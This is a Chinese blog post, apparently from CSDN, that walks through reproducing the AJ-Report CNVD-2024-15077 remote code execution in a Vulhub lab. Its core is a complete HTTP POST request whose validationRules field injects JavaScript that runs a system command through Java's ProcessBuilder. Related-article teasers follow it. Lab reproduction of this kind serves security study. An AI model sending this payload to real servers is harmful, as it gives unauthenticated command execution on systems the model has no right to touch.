Vulhub靶机 AJ-Report(CNVD-2024-15077)(渗透测试详解)

最新推荐文章于 2025-06-03 16:33:38 发布
最新推荐文章于 2025-06-03 16:33:38 发布
阅读量420 收藏
点赞数 2
CC 4.0 BY-SA版权
文章标签: linux web安全 网络 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_78721909/article/details/145814067

一、开启vulhub环境

docker-compose up -d  启动
docker ps 查看开放的端口

漏洞范围

AJ-Report  <= 1.4.0版本

二、访问靶机IP 9095端口

 

1、利用bp,抓取当前页面的包,并修改post请求如下

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: yourIP:9095
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

至此,命令执行完成。

下期再见,家人们。

 

芜丶湖
关注
AJ-Report开源数据大屏 verification;swagger-ui RCE漏洞复现
0xSec
05-03 1699
AJ-Report开源数据大屏 verification;swagger-ui接口存在远程命令执行漏洞,未经身份验证的远程攻击者可以利用此类漏洞执行任意命令,写入后门文件,最终可获取服务器权限。
AJ_Report(14)
qq_53025984的博客
12-20 497
2021SC@SDUSC 代码地址:…\AJ_report\report-master\report-core\src\main\java\com\anjiplus\template\gaea\business\util\UuidUtil.java 代码内容: package com.anjiplus.template.gaea.business.util; import java.security.SecureRandom; import java.util.UUID; /** * Created
AJ-Report 认证绕过与远程代码执行漏洞(CNVD-2024-15077)漏洞分析及复现
m0_61468705的博客
01-20 1782
verification方法未对传入的参数进行过滤,可以执行JavaScript函数,导致命令执行漏洞。validationRules可来自用户输入,没有对用户输入进行充分的验证和清理,恶意用户可能构造恶意的JavaScript代码并将其传递给validationRules,从而在服务器上执行不安全的操作。例如,你可以将JavaScript代码作为字符串传入,eval()会执行这段代码并返回执行结果。允许动态执行脚本,因此如果传入的脚本内容来自不可信的来源,就有可能遭遇。
AJ-Report
最新发布
m0_74848570的博客
06-03 483
validationRules字符串可来自用户输入,没有对用户输入做验证和清理,恶意用户可构造恶意的JavaScript代码传递给validationRules,从而在服务器上执行恶意命令。AJ-Report是完全开源的BI(Business intelligence)平台,旨在帮助用户生成和管理各种类型的报表。调用Swagger UI 接口发送的POST数据包,以JSON格式传递数据,在key为validationRules中构造命令。账号要求:无需登录,无需账号。步骤1:构造数据包如下。
使用idea远程远程debug漏洞以及CNVD-2024-15077漏洞分析
adorkablezhenbai的博客
06-14 478
成功下载后可以到vulhub目录下的/xxx(aj-report)/CNVD-2024-15077/漏洞下进行docker-compose up -d 启动漏洞。最后在idea中把lib中对应的jar添加到依赖(有的还需要把对应的文件夹 META-INFO添加)即可开始远程debug。docker pull 的时候可能会超时修改docker image拉取的地址可以进行缓解。docker cp 把对应的源码拷出来,然后将文件复制到自己的本机上。到base对应漏洞下可以查看docker启动的命令。
AJ-Report (1)
qq_53025984的博客
09-29 613
2021SC@SDUSC AJ-Report项目综述: AJ-Report是一个开源的BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑。     多数据源支持,内置mysql、elasticsearch、kudu驱动,支持自定义数据集省去数据接口开发,支持17+种大屏组件,不会开发,照着设计稿也可以制作大屏。 三步轻松完成大屏设计:配置数据源---->写SQL配置数据集---->拖拽配置大屏---->保存发布。 功能概述: 大屏设计(AJ-Report)是一个可视化拖
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
vulhub复现CVE-2021-44228log4j漏洞
weixin_48878440的博客
12-12 1228
vulhub复现cve-2021-44228 log4j漏洞
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1529
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
AJ-Report是一个完全开源,拖拽编辑的可视化设计工具
欧菲丽的博客
05-23 2220
AJ-Report是全开源的一个BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑。多数据源支持,内置mysql、elasticsearch、kudu驱动,支持自定义数据集省去数据接口开发,目前已支持30+种大屏组件/图表,不会开发,照着设计稿也可以制作大屏。三步轻松完成大屏设计:配置数据源---->写SQL配置数据集---->拖拽配置大屏---->保存发布。欢迎体验。组件介绍大屏设计(AJ-Report)是一个可视化拖拽编辑的,直观,酷炫,具有科技感的图表工具全开源项目。
AJ-Report:一款开源且非常强大的数据可视化大屏和报表工具
11-03 4127
AJ-Report是一个基于Java的开源报表工具,它集成了ECharts、Ant Design Vue等前端技术,致力于为企业提供一站式的数据可视化解决方案。
AJ-Report 【开源的一个BI平台】
qq_34068440的博客
02-05 2295
大屏设计(AJ-Report)是一个可视化拖拽编辑的,直观,酷炫,具有科技感的图表工具全开源项目。内置的基础功能包括数据源,数据集,报表管理,项目部分截图如下。
AJ-Report使用
super_mochi1
11-14 727
Aj-Report使用
AJ-Report :成功申报中国科协开源评选
GitCode
11-29 1244
恭喜AJ-Report :成功申报中国科协开源评选 中国科协首届2021“科创中国”开源创新榜评选正在进行中,全程免费参与,对于申报成功的开源产品/社区/机构,主承办方会组织各种形式的宣传报道。 AJ-Report :一个全开源的BI平台 AJ-Report :成功申报中国科协开源评选 开源项目介绍 简介 AJ-Report是全开源的一个BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑。 多数据源支持,内置mysql、elasticsearch、kudu驱动,支持自定义数据集省.
开源BI 平台AJ-Report —— 筑梦之路
筑梦之路
12-15 1113
AJ-Report: AJ-Report是一个完全开源,拖拽编辑的可视化设计工具。三步快速完成大屏:配置数据源---->写SQL配置数据集---->拖拽生成大屏。让管理层随时随地掌控业务动态,让每个决策都有数据支撑。
AJ_Report(2)
qq_53025984的博客
11-25 514
2021SC@SDUSC 源码地址:…\AJ_report\report-master\report-core\src\main\java\com\anjiplus\template\gaea\business\code\ResponseCode.java 代码内容: package com.anjiplus.template.gaea.business.code; /** * 响应码 * @author lr * @since 2021-02-22 */ public interface Res
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值